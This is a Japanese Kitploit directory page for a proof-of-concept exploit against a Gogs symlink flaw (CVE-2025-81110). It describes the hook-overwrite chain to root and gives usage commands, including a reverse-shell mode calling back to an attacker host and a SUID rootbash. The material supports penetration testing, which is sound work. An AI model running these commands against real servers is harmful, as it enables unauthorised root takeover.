Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/bridgeralderson/cve-2025-81110-poc
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubbridgeralderson/cve-2025-81110-poc

CVE-2025-81110-PoC

GogsのPutContents APIにおける不適切なシンボリックリンク処理により、ローカルでのコード実行が可能になります。

リポジトリを見る
415ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-81110-PoC

GogsのPutContents APIにおけるシンボリックリンクの不適切な処理により、ローカルでのコード実行が可能になります。

このリポジトリには、Gogs 0.13.0未満のバージョンにおける重大な脆弱性に対するプロフェッショナルグレードのエクスプロイトが含まれています。このエクスプロイトは、リポジトリの内容を更新する際にGogs APIがファイルタイプの検証に失敗するという論理的な欠陥を利用します。サーバー側のGitフック(pre-receive)を指すシンボリックリンクを注入することで、認証されたユーザーがフックの内容を悪意のあるスクリプトで上書きできます。その後のGitプッシュ操作により、Gogsサービスを実行しているユーザー(通常はroot)のコンテキストでこのスクリプトが実行されます。

シンボリックリンク注入:攻撃者は内部リポジトリフック(例:/root/gogs-repositories//.git/hooks/pre-receive)を指すシンボリックリンクをプッシュします。

API上書き:Gogs APIはシンボリックリンクの内容の更新を許可します。書き込み操作中にOSがリンクをたどるため、内部Gitフックが上書きされます。

RCE / 権限昇格:その後のGitプッシュによりpre-receiveフックがトリガーされます。GogsがRUN_USER = rootに設定されている場合、攻撃者はシステム全体の制御を獲得します。

必要条件

  • Python 3.x
  • requestsライブラリ
  • 攻撃マシンにインストールされたgitコマンドラインツール

使用方法

SUIDモード

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode suid

完了後、ターゲットでrootアクセスを取得:

root@kitploit:~
/tmp/rootbash -p

リバースシェル

root@kitploit:~
python3 exploit.py --url http://target:3000 --user <username> --pass <password> --mode rev --lhost <your_ip> --lport 4444

引数リファレンス

免責事項

このツールは教育目的および許可されたセキュリティ監査のみを対象としています。作者は、お客様が所有する、またはテストする明示的な許可を得たシステム上でこのツールが引き起こした誤用や損害について一切の責任を負いません。

ツールをダウンロード
引数必須説明
--url必須GogsインスタンスのベースURL(例:http://127.0.0.1:3001)。
--user必須認証のための有効なユーザー名。
--pass必須指定されたユーザーの有効なパスワード。
--mode任意エクスプロイトモード:suid(/tmp/rootbashを作成)またはrev(リバースシェル)。
--lhost任意リバースシェルのコールバック用ローカルIPアドレス。
--lport任意リバースシェルリスナーのローカルポート番号。